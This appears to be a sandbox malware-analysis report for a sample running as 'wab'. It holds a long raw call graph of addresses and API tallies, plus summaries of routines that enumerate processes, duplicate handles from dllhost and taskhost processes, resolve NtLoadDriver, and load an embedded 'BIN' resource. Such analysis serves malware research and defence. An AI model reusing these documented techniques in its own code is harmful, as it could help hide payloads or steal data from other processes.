39775 40a8d0 7 API calls 39769->39775 39772 40ce5e 39795 40abb7 wcslen memmove 39772->39795 39773 40ce93 39798 40abb7 wcslen memmove 39773->39798 39777 40cecb 39775->39777 39799 40d00b malloc memcpy ??3@YAXPAX ??3@YAXPAX 39777->39799 39779 40cedd 39780 40aa04 ??3@YAXPAX 39779->39780 39781 40cee5 39780->39781 39782 40aa04 ??3@YAXPAX 39781->39782 39783 40ceed 39782->39783 39784 40aa04 ??3@YAXPAX 39783->39784 39784->39754 39786 40aa33 39785->39786 39787 40aa63 39785->39787 39788 40aa44 39786->39788 39789 40aa38 wcslen 39786->39789 39787->39754 39787->39758 39790 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 39788->39790 39789->39788 39791 40aa4d 39790->39791 39791->39787 39792 40aa51 memcpy 39791->39792 39792->39787 39793->39766 39794->39772 39795->39762 39796->39768 39797->39773 39798->39763 39799->39779 39800->39737 39801->38901 39802->38909 37668 44dea5 37669 44deb5 FreeLibrary 37668->37669 37670 44dec3 37668->37670 37669->37670 39812 4148b6 FindResourceW 39813 4148f9 39812->39813 39814 4148cf SizeofResource 39812->39814 39814->39813 39815 4148e0 LoadResource 39814->39815 39815->39813 39816 4148ee LockResource 39815->39816 39816->39813 37849 415304 ??3@YAXPAX 37671 415320 realloc 37672 415340 37671->37672 37673 41534d 37671->37673 37675 416760 11 API calls 37673->37675 37675->37672 39817 441b3f 39827 43a9f6 39817->39827 39819 441b61 40000 4386af memset 39819->40000 39821 44189a 39822 4418e2 39821->39822 39826 442bd4 39821->39826 39824 4418ea 39822->39824 40001 4414a9 12 API calls 39822->40001 39826->39824 40002 441409 memset 39826->40002 39828 43aa20 39827->39828 39829 43aadf 39827->39829 39828->39829 39830 43aa34 memset 39828->39830 39829->39819 39831 43aa56 39830->39831 39832 43aa4d 39830->39832 40003 43a6e7 39831->40003 40011 42c02e memset 39832->40011 39837 43aad3 40013 4169a7 11 API calls 39837->40013 39838 43aaae 39838->39829 39838->39837 39853 43aae5 39838->39853 39839 43ac18 39842 43ac47 39839->39842 40015 42bbd5 memcpy memcpy memcpy memset memcpy 39839->40015 39843 43aca8 39842->39843 40016 438eed 16 API calls 39842->40016 39847 43acd5 39843->39847 40018 4233ae 11 API calls 39843->40018 39846 43ac87 40017 4233c5 16 API calls 39846->40017 40019 423426 11 API calls 39847->40019 39851 43ace1 40020 439811 163 API calls 39851->40020 39852 43a9f6 161 API calls 39852->39853 39853->39829 39853->39839 39853->39852 40014 439bbb 22 API calls 39853->40014 39855 43acfd 39860 43ad2c 39855->39860 40021 438eed 16 API calls 39855->40021 39857 43ad19 40022 4233c5 16 API calls 39857->40022 39859 43ad58 40023 44081d 163 API calls 39859->40023 39860->39859 39863 43add9 39860->39863 40027 423426 11 API calls 39863->40027 39864 43ae3a memset 39865 43ae73 39864->39865 40028 42e1c0 147 API calls 39865->40028 39866 43adab 40025 438c4e 163 API calls 39866->40025 39867 43ad6c 39867->39829 39867->39866 40024 42370b memset memcpy memset 39867->40024 39871 43adcc 40026 440f84 12 API calls 39871->40026 39872 43ae96 40029 42e1c0 147 API calls 39872->40029 39875 43aea8 39876 43aec1 39875->39876 40030 42e199 147 API calls 39875->40030 39878 43af00 39876->39878 40031 42e1c0 147 API calls 39876->40031 39878->39829 39881 43af1a 39878->39881 39882 43b3d9 39878->39882 40032 438eed 16 API calls 39881->40032 39887 43b3f6 39882->39887 39888 43b4c8 39882->39888 39883 43b60f 39883->39829 40091 4393a5 17 API calls 39883->40091 39886 43af2f 40033 4233c5 16 API calls 39886->40033 40073 432878 12 API calls 39887->40073 39898 43b4f2 39888->39898 40079 42bbd5 memcpy memcpy memcpy memset memcpy 39888->40079 39890 43af51 40034 423426 11 API calls 39890->40034 39893 43af7d 40035 423426 11 API calls 39893->40035 39897 43af94 40036 423330 11 API calls 39897->40036 40080 43a76c 21 API calls 39898->40080 39899 43b529 40081 44081d 163 API calls 39899->40081 39900 43b462 40075 423330 11 API calls 39900->40075 39904 43b428 39904->39900 40074 432b60 16 API calls 39904->40074 39905 43afca 40037 423330 11 API calls 39905->40037 39906 43b47e 39910 43b497 39906->39910 40076 42374a memcpy memset memcpy memcpy memcpy 39906->40076 39907 43b544 39908 43b55c 39907->39908 40082 42c02e memset 39907->40082 40083 43a87a 163 API calls 39908->40083 40077 4233ae 11 API calls 39910->40077 39912 43afdb 40038 4233ae 11 API calls 39912->40038 39916 43b4b1 40078 423399 11 API calls 39916->40078 39918 43b56c 39921 43b58a 39918->39921 40084 423330 11 API calls 39918->40084 39920 43afee 40039 44081d 163 API calls 39920->40039 40085 440f84 12 API calls 39921->40085 39922 43b4c1 40087 42db80 163 API calls 39922->40087 39927 43b592 40086 43a82f 16 API calls 39927->40086 39930 43b5b4 40088 438c4e 163 API calls 39930->40088 39932 43b5cf 40089 42c02e memset 39932->40089 39934 43b005 39934->39829 39939 43b01f 39934->39939 40040 42d836 163 API calls 39934->40040 39935 43b1ef 40050 4233c5 16 API calls 39935->40050 39937 43b212 40051 423330 11 API calls 39937->40051 39939->39935 40048 423330 11 API calls 39939->40048 40049 42d71d 163 API calls 39939->40049 39941 43b087 40041 4233ae 11 API calls 39941->40041 39942 43add4 39942->39883 40090 438f86 16 API calls 39942->40090 39945 43b22a 40052 42ccb5 11 API calls 39945->40052 39948 43b23f 40053 4233ae 11 API calls 39948->40053 39949 43b10f 40044 423330 11 API calls 39949->40044 39951 43b257 40054 4233ae 11 API calls 39951->40054 39955 43b129 40045 4233ae 11 API calls 39955->40045 39956 43b26e 40055 4233ae 11 API calls 39956->40055 39959 43b09a 39959->39949 40042 42cc15 19 API calls 39959->40042 40043 4233ae 11 API calls 39959->40043 39960 43b282 40056 43a87a 163 API calls 39960->40056 39962 43b13c 40046 440f84 12 API calls 39962->40046 39964 43b29d 40057 423330 11 API calls 39964->40057 39967 43b2af 39970 43b2b8 39967->39970 39971 43b2ce 39967->39971 39968 43b15f 40047 4233ae 11 API calls 39968->40047 40058 4233ae 11 API calls 39970->40058 40059 440f84 12 API calls 39971->40059 39974 43b2c9 40061 4233ae 11 API calls 39974->40061 39975 43b2da 40060 42370b memset memcpy memset 39975->40060 39978 43b2f9 40062 423330 11 API calls 39978->40062 39980 43b30b 40063 423330 11 API calls 39980->40063 39982 43b325 40064 423399 11 API calls 39982->40064 39984 43b332 40065 4233ae 11 API calls 39984->40065 39986 43b354 40066 423399 11 API calls 39986->40066 39988 43b364 40067 43a82f 16 API calls 39988->40067 39990 43b370 40068 42db80 163 API calls 39990->40068 39992 43b380 40069 438c4e 163 API calls 39992->40069 39994 43b39e 40070 423399 11 API calls 39994->40070 39996 43b3ae 40071 43a76c 21 API calls 39996->40071 39998 43b3c3 40072 423399 11 API calls 39998->40072 40000->39821 40001->39824 40002->39826 40004 43a6f5 40003->40004 40006 43a765 40003->40006 40004->40006 40092 42a115 40004->40092 40006->39829 40012 4397fd memset 40006->40012 40009 43a73d 40009->40006 40010 42a115 147 API calls 40009->40010 40010->40006 40011->39831 40012->39838 40013->39829 40014->39853 40015->39842 40016->39846 40017->39843 40018->39847 40019->39851 40020->39855 40021->39857 40022->39860 40023->39867 40024->39866 40025->39871 40026->39942 40027->39864 40028->39872 40029->39875 40030->39876 40031->39876 40032->39886 40033->39890 40034->39893 40035->39897 40036->39905 40037->39912 40038->39920 40039->39934 40040->39941 40041->39959 40042->39959 40043->39959 40044->39955 40045->39962 40046->39968 40047->39939 40048->39939 40049->39939 40050->39937 40051->39945 40052->39948 40053->39951 40054->39956 40055->39960 40056->39964 40057->39967 40058->39974 40059->39975 40060->39974 40061->39978 40062->39980 40063->39982 40064->39984 40065->39986 40066->39988 40067->39990 40068->39992 40069->39994 40070->39996 40071->39998 40072->39942 40073->39904 40074->39900 40075->39906 40076->39910 40077->39916 40078->39922 40079->39898 40080->39899 40081->39907 40082->39908 40083->39918 40084->39921 40085->39927 40086->39922 40087->39930 40088->39932 40089->39942 40090->39883 40091->39829 40093 42a175 40092->40093 40095 42a122 40092->40095 40093->40006 40098 42b13b 147 API calls 40093->40098 40095->40093 40096 42a115 147 API calls 40095->40096 40099 43a174 40095->40099 40123 42a0a8 147 API calls 40095->40123 40096->40095 40098->40009 40113 43a196 40099->40113 40114 43a19e 40099->40114 40100 43a306 40100->40113 40143 4388c4 14 API calls 40100->40143 40103 42a115 147 API calls 40103->40114 40105 43a642 40105->40113 40147 4169a7 11 API calls 40105->40147 40109 43a635 40146 42c02e memset 40109->40146 40113->40095 40114->40100 40114->40103 40114->40113 40124 42ff8c 40114->40124 40132 415a91 40114->40132 40136 4165ff 40114->40136 40139 439504 13 API calls 40114->40139 40140 4312d0 147 API calls 40114->40140 40141 42be4c memcpy memcpy memcpy memset memcpy 40114->40141 40142 43a121 11 API calls 40114->40142 40116 4169a7 11 API calls 40117 43a325 40116->40117 40117->40105 40117->40109 40117->40113 40117->40116 40118 42b5b5 memset memcpy 40117->40118 40119 42bf4c 14 API calls 40117->40119 40122 4165ff 11 API calls 40117->40122 40144 42b63e 14 API calls 40117->40144 40145 42bfcf memcpy 40117->40145 40118->40117 40119->40117 40122->40117 40123->40095 40148 43817e 40124->40148 40126 42ff99 40127 42ffe3 40126->40127 40128 42ffd0 40126->40128 40131 42ff9d 40126->40131 40153 4169a7 11 API calls 40127->40153 40152 4169a7 11 API calls 40128->40152 40131->40114 40133 415a9d 40132->40133 40134 415ab3 40133->40134 40135 415aa4 memset 40133->40135 40134->40114 40135->40134 40300 4165a0 40136->40300 40139->40114 40140->40114 40141->40114 40142->40114 40143->40117 40144->40117 40145->40117 40146->40105 40147->40113 40149 438187 40148->40149 40151 438192 40148->40151 40154 4380f6 40149->40154 40151->40126 40152->40131 40153->40131 40156 43811f 40154->40156 40155 438164 40155->40151 40156->40155 40158 4300e8 3 API calls 40156->40158 40159 437e5e 40156->40159 40158->40156 40182 437d3c 40159->40182 40161 437eb3 40161->40156 40162 437ea9 40162->40161 40167 437f22 40162->40167 40197 41f432 40162->40197 40165 437f06 40244 415c56 11 API calls 40165->40244 40169 437f7f 40167->40169 40170 432d4e 3 API calls 40167->40170 40168 437f95 40245 415c56 11 API calls 40168->40245 40169->40168 40171 43802b 40169->40171 40170->40169 40173 4165ff 11 API calls 40171->40173 40174 438054 40173->40174 40208 437371 40174->40208 40177 43806b 40178 438094 40177->40178 40246 42f50e 138 API calls 40177->40246 40180 4300e8 3 API calls 40178->40180 40181 437fa3 40178->40181 40180->40181 40181->40161 40247 41f638 104 API calls 40181->40247 40183 437d69 40182->40183 40186 437d80 40182->40186 40248 437ccb 11 API calls 40183->40248 40185 437d76 40185->40162 40186->40185 40187 437da3 40186->40187 40188 437d90 40186->40188 40190 438460 134 API calls 40187->40190 40188->40185 40252 437ccb 11 API calls 40188->40252 40193 437dcb 40190->40193 40191 437de8 40251 424f26 123 API calls 40191->40251 40193->40191 40249 444283 13 API calls 40193->40249 40195 437dfc 40250 437ccb 11 API calls 40195->40250 40198 41f54d 40197->40198 40204 41f44f 40197->40204 40199 41f466 40198->40199 40282 41c635 memset memset 40198->40282 40199->40165 40199->40167 40204->40199 40206 41f50b 40204->40206 40253 41f1a5 40204->40253 40278 41c06f memcmp 40204->40278 40279 41f3b1 90 API calls 40204->40279 40280 41f398 86 API calls 40204->40280 40206->40198 40206->40199 40281 41c295 86 API calls 40206->40281 40283 41703f 40208->40283 40210 437399 40211 43739d 40210->40211 40213 4373ac 40210->40213 40290 4446ea 11 API calls 40211->40290 40214 416935 16 API calls 40213->40214 40215 4373ca 40214->40215 40216 438460 134 API calls 40215->40216 40221 4251c4 137 API calls 40215->40221 40225 415a91 memset 40215->40225 40228 43758f 40215->40228 40240 437584 40215->40240 40243 437d3c 135 API calls 40215->40243 40291 425433 13 API calls 40215->40291 40292 425413 17 API calls 40215->40292 40293 42533e 16 API calls 40215->40293 40294 42538f 16 API calls 40215->40294 40295 42453e 123 API calls 40215->40295 40216->40215 40217 4375bc 40219 415c7d 16 API calls 40217->40219 40220 4375d2 40219->40220 40222 4442e6 11 API calls 40220->40222 40242 4373a7 40220->40242 40221->40215 40223 4375e2 40222->40223 40223->40242 40298 444283 13 API calls 40223->40298 40225->40215 40296 42453e 123 API calls 40228->40296 40231 4375f4 40234 437620 40231->40234 40235 43760b 40231->40235 40233 43759f 40236 416935 16 API calls 40233->40236 40238 416935 16 API calls 40234->40238 40299 444283 13 API calls 40235->40299 40236->40240 40238->40242 40240->40217 40297 42453e 123 API calls 40240->40297 40241 437612 memcpy 40241->40242 40242->40177 40243->40215 40244->40161 40245->40181 40246->40178 40247->40161 40248->40185 40249->40195 40250->40191 40251->40185 40252->40185 40254 41bc3b 101 API calls 40253->40254 40255 41f1b4 40254->40255 40256 41edad 86 API calls 40255->40256 40263 41f282 40255->40263 40257 41f1cb 40256->40257 40258 41f1f5 memcmp 40257->40258 40259 41f20e 40257->40259 40257->40263 40258->40259 40260 41f21b memcmp 40259->40260 40259->40263 40261 41f326 40260->40261 40264 41f23d 40260->40264 40262 41ee6b 86 API calls 40261->40262 40261->40263 40262->40263 40263->40204 40264->40261 40265 41f28e memcmp 40264->40265 40267 41c8df 56 API calls 40264->40267 40265->40261 40266 41f2a9 40265->40266 40266->40261 40269 41f308 40266->40269 40270 41f2d8 40266->40270 40268 41f269 40267->40268 40268->40261 40271 41f287 40268->40271 40272 41f27a 40268->40272 40269->40261 40276 4446ce 11 API calls 40269->40276 40273 41ee6b 86 API calls 40270->40273 40271->40265 40274 41ee6b 86 API calls 40272->40274 40275 41f2e0 40273->40275 40274->40263 40277 41b1ca memset 40275->40277 40276->40261 40277->40263 40278->40204 40279->40204 40280->40204 40281->40198 40282->40199 40284 417044 40283->40284 40285 41705c 40283->40285 40287 416760 11 API calls 40284->40287 40289 417055 40284->40289 40286 417075 40285->40286 40288 41707a 11 API calls 40285->40288 40286->40210 40287->40289 40288->40284 40289->40210 40290->40242 40291->40215 40292->40215 40293->40215 40294->40215 40295->40215 40296->40233 40297->40217 40298->40231 40299->40241 40305 415cfe 40300->40305 40310 415d23 __aullrem __aulldvrm 40305->40310 40312 41628e 40305->40312 40306 4163ca 40319 416422 11 API calls 40306->40319 40308 416172 memset 40308->40310 40309 416422 10 API calls 40309->40310 40310->40306 40310->40308 40310->40309 40311 415cb9 10 API calls 40310->40311 40310->40312 40311->40310 40313 416520 40312->40313 40314 416527 40313->40314 40318 416574 40313->40318 40316 416544 40314->40316 40314->40318 40320 4156aa 11 API calls 40314->40320 40317 416561 memcpy 40316->40317 40316->40318 40317->40318 40318->40114 40319->40312 40320->40316 40352 41493c EnumResourceNamesW 37677 4287c1 37678 4287d2 37677->37678 37679 429ac1 37677->37679 37680 428818 37678->37680 37681 42881f 37678->37681 37687 425711 37678->37687 37692 425ad6 37679->37692 37747 415c56 11 API calls 37679->37747 37714 42013a 37680->37714 37742 420244 97 API calls 37681->37742 37686 4260dd 37741 424251 120 API calls 37686->37741 37687->37679 37689 4259da 37687->37689 37695 422aeb memset memcpy memcpy 37687->37695 37696 429a4d 37687->37696 37699 4260a1 37687->37699 37710 4259c2 37687->37710 37713 425a38 37687->37713 37730 4227f0 memset memcpy 37687->37730 37731 422b84 15 API calls 37687->37731 37732 422b5d memset memcpy memcpy 37687->37732 37733 422640 13 API calls 37687->37733 37735 4241fc 11 API calls 37687->37735 37736 42413a 90 API calls 37687->37736 37740 416760 11 API calls 37689->37740 37695->37687 37697 429a66 37696->37697 37701 429a9b 37696->37701 37743 415c56 11 API calls 37697->37743 37739 415c56 11 API calls 37699->37739 37702 429a96 37701->37702 37745 416760 11 API calls 37701->37745 37746 424251 120 API calls 37702->37746 37705 429a7a 37744 416760 11 API calls 37705->37744 37710->37692 37734 415c56 11 API calls 37710->37734 37713->37710 37737 422640 13 API calls 37713->37737 37738 4226e0 12 API calls 37713->37738 37715 42014c 37714->37715 37718 420151 37714->37718 37757 41e466 97 API calls 37715->37757 37717 420162 37717->37687 37718->37717 37719 4201b3 37718->37719 37720 420229 37718->37720 37721 4201b8 37719->37721 37722 4201dc 37719->37722 37720->37717 37723 41fd5e 86 API calls 37720->37723 37748 41fbdb 37721->37748 37722->37717 37726 4201ff 37722->37726 37754 41fc4c 37722->37754 37723->37717 37726->37717 37729 42013a 97 API calls 37726->37729 37729->37717 37730->37687 37731->37687 37732->37687 37733->37687 37734->37689 37735->37687 37736->37687 37737->37713 37738->37713 37739->37689 37740->37686 37741->37692 37742->37687 37743->37705 37744->37702 37745->37702 37746->37679 37747->37689 37749 41fbf1 37748->37749 37750 41fbf8 37748->37750 37753 41fc39 37749->37753 37772 4446ce 11 API calls 37749->37772 37762 41ee26 37750->37762 37753->37717 37758 41fd5e 37753->37758 37755 41ee6b 86 API calls 37754->37755 37756 41fc5d 37755->37756 37756->37722 37757->37718 37760 41fd65 37758->37760 37759 41fdab 37759->37717 37760->37759 37761 41fbdb 86 API calls 37760->37761 37761->37760 37763 41ee41 37762->37763 37764 41ee32 37762->37764 37773 41edad 37763->37773 37776 4446ce 11 API calls 37764->37776 37767 41ee3c 37767->37749 37770 41ee58 37770->37767 37778 41ee6b 37770->37778 37772->37753 37782 41be52 37773->37782 37776->37767 37777 41eb85 11 API calls 37777->37770 37779 41ee70 37778->37779 37780 41ee78 37778->37780 37835 41bf99 86 API calls 37779->37835 37780->37767 37783 41be6f 37782->37783 37784 41be5f 37782->37784 37790 41be8c 37783->37790 37814 418c63 memset memset 37783->37814 37813 4446ce 11 API calls 37784->37813 37787 41be69 37787->37767 37787->37777 37788 41bee7 37788->37787 37818 41a453 86 API calls 37788->37818 37790->37787 37790->37788 37791 41bf3a 37790->37791 37794 41bed1 37790->37794 37817 4446ce 11 API calls 37791->37817 37793 41bef0 37793->37788 37796 41bf01 37793->37796 37794->37793 37797 41bee2 37794->37797 37795 41bf24 memset 37795->37787 37796->37795 37798 41bf14 37796->37798 37815 418a6d memset memcpy memset 37796->37815 37803 41ac13 37797->37803 37816 41a223 memset memcpy memset 37798->37816 37802 41bf20 37802->37795 37804 41ac52 37803->37804 37805 41ac3f memset 37803->37805 37808 41ac6a 37804->37808 37819 41dc14 19 API calls 37804->37819 37806 41acd9 37805->37806 37806->37788 37810 41aca1 37808->37810 37820 41519d 37808->37820 37810->37806 37811 41acc0 memset 37810->37811 37812 41accd memcpy 37810->37812 37811->37806 37812->37806 37813->37787 37814->37790 37815->37798 37816->37802 37817->37788 37819->37808 37823 4175ed 37820->37823 37831 417570 SetFilePointer 37823->37831 37826 41760a ReadFile 37827 417637 37826->37827 37828 417627 GetLastError 37826->37828 37829 4151b3 37827->37829 37830 41763e memset 37827->37830 37828->37829 37829->37810 37830->37829 37832 4175b2 37831->37832 37833 41759c GetLastError 37831->37833 37832->37826 37832->37829 37833->37832 37834 4175a8 GetLastError 37833->37834 37834->37832 37835->37780 37836 417bc5 37838 417c61 37836->37838 37842 417bda 37836->37842 37837 417bf6 UnmapViewOfFile CloseHandle 37837->37837 37837->37842 37840 417c2c 37840->37842 37848 41851e 20 API calls 37840->37848 37842->37837 37842->37838 37842->37840 37843 4175b7 37842->37843 37844 4175d6 FindCloseChangeNotification 37843->37844 37845 4175c8 37844->37845 37846 4175df 37844->37846 37845->37846 37847 4175ce Sleep 37845->37847 37846->37842 37847->37844 37848->37840 39803 4147f3 39806 414561 39803->39806 39805 414813 39807 41456d 39806->39807 39808 41457f GetPrivateProfileIntW 39806->39808 39811 4143f1 memset _itow WritePrivateProfileStringW 39807->39811 39808->39805 39810 41457a 39810->39805 39811->39810

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 FindCloseChangeNotification GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 354 40de5a 351->354 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 356 40de5d-40de63 354->356 358 40de74-40de78 356->358 359 40de65-40de6c 356->359 358->352 358->356 359->358 360 40de6e-40de71 359->360 360->358 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 377 40dffd-40e006 372->377 373->363 373->377 375 40df08 374->375 376 40dfef-40dff2 CloseHandle 374->376 378 40df0b-40df10 375->378 376->373 377->362 377->363 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 381 40df23-40df4a GetCurrentProcess DuplicateHandle 379->381 380->378 382 40dfd1-40dfd3 380->382 381->380 383 40df4c-40df76 memset call 41352f 381->383 382->376 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->376
                                    APIs
                                    • memset.MSVCRT ref: 0040DDAD
                                      • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                    • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                      • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT ref: 0040AFD8
                                      • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                      • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                    • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                    • FindCloseChangeNotification.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                    • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                    • _wcsicmp.MSVCRT ref: 0040DEB2
                                    • _wcsicmp.MSVCRT ref: 0040DEC5
                                    • _wcsicmp.MSVCRT ref: 0040DED8
                                    • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                    • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                    • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                    • memset.MSVCRT ref: 0040DF5F
                                    • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                    • _wcsicmp.MSVCRT ref: 0040DFB2
                                    • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: AddressProc$Handle_wcsicmp$CloseProcess$CurrentFileModulememset$??2@ChangeCreateDuplicateFindInformationNameNotificationOpenQuerySystem
                                    • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                    • API String ID: 594330280-3398334509
                                    • Opcode ID: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                    • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                    • Opcode Fuzzy Hash: c0cdbd66bb0eb3cac082432fda8d0328b9155cc6ebf5e989b7bcc70ed293d7d6
                                    • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 ??3@YAXPAX@Z 585->588 590 413edb-413ee2 587->590 588->590 594 413ee4 590->594 595 413ee7-413efe 590->595 604 413ea2-413eae CloseHandle 592->604 598 413e61-413e68 593->598 599 413e37-413e44 GetModuleHandleW 593->599 594->595 595->580 598->592 601 413e6a-413e76 598->601 599->598 600 413e46-413e5c GetProcAddress 599->600 600->598 601->592 604->583
                                    APIs
                                      • Part of subcall function 0040B633: ??3@YAXPAX@Z.MSVCRT ref: 0040B63A
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00413D6A
                                    • memset.MSVCRT ref: 00413D7F
                                    • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                    • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                    • memset.MSVCRT ref: 00413E07
                                    • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                    • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                    • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                    • ??3@YAXPAX@Z.MSVCRT ref: 00413EC1
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                    • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Handle$??3@CloseProcess32memset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                    • String ID: QueryFullProcessImageNameW$kernel32.dll
                                    • API String ID: 912665193-1740548384
                                    • Opcode ID: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                    • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                    • Opcode Fuzzy Hash: d01459b62e4562fe598c3dda65fe2a12e31c3c57d7bea03f0a3dc75513a8eb61
                                    • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9
                                    APIs
                                    • GetModuleHandleW.KERNEL32(00000000,00000000,?,?), ref: 0040B5A5
                                    • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                    • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                    • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                    • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                    • memcpy.MSVCRT ref: 0040B60D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                    • String ID: BIN
                                    • API String ID: 1668488027-1015027815
                                    • Opcode ID: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                    • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                    • Opcode Fuzzy Hash: 6cadd12acd146c90b5568bc01b4485451bf9b169e768bef5838699a2d497f07b
                                    • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                    APIs
                                    • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                    • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                    Memory Dump Source
                                    • Source File: 0000000D.00000002.3223383068.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                                    Similarity
                                    • API ID: FileFind$FirstNext
                                    • String ID:
                                    • API String ID: 1690352074-0
                                    • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
